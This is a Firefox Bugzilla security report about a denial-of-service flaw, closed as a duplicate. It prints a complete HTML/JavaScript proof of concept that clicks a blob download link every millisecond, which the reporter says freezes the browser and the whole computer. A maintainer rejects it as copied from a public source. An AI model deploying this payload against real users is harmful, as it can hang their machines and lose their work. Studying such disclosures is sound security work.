Closed Bug 1691678 Opened 4 years ago Closed 4 years ago

FIREFOX DOS ATTACK WHICH LEADS TO COMPUTER HANG(UNRESPONSIVE)

Categories

(Firefox :: Security, task)

Product:
Firefox
Component:
Security
Type:
task

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1685526

People

(Reporter: raghavraka1807, Unassigned)

Details

(Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Attachments

(1 file)

DOS.html
517 bytes, text/html
Details
Attached file DOS.html

I have discovered a DOS Attack on Mozilla Firefox which is valid on all latest version.
After using my payload script the Firefox browser fully become unresponsive and it too makes the full system(computer) unresponsive.
The Victim has to force shut down the whole PC by powering off as whole system has got in an unresponsive mode.
Attacker has just to use my payload for attacking a client browser and full system by this critical DOS Attack.

STEPS TO REPRODUCE:-

  1. Make a HTML file(e.g: say dos.html) with this piece of script given here.
    <!DOCTYPE html>
    <html>
    <head>
    <meta charset="utf-8" />
    <title>Firefox DoS ❄</title>
    </head>
    <body>
    </body>

<script>
const payload = decodeURIComponent('**************************************************************************************"""""""""""""""""')
const blob = new Blob([], {type: payload});
const a = document.createElement('a');
document.body.appendChild(a);
a.download = payload;
a.href = window.URL.createObjectURL(blob);
setInterval(() => a.click(), 1);
</script>
</html>

  1. save it.
  2. Now open it in any firefox browser of any build.
    I have tested this Attack on FIREFOX ESR, FIREFOX NIGHTLY AND FIREFOX. The Attack is working there in these three with all version infected.
  3. After the HTML file got opened in the Firefox Browser the Firefox browser will become unresponsive after 3-20sec and the victim can get out of this DOS Attack only by force Shut Down of the PC.

I have attached the DOS.html script in the attachment. Opening the attachment file in Firefox will start a DOS attack.

(This DOS attack is a very severe and should be considered in bug bounty consideration.)

Flags: sec-bounty?

This is a duplicate of a public bug. You've clearly copy-pasted this exploit from https://gist.github.com/pwnsdx/d20a99c0500d6f05993ef730bef26746 without attribution and with only trivial modifications. This is unethical and wastes our time. Stop it.

Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 4 years ago
Resolution: --- → DUPLICATE
Flags: sec-bounty? → sec-bounty-
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: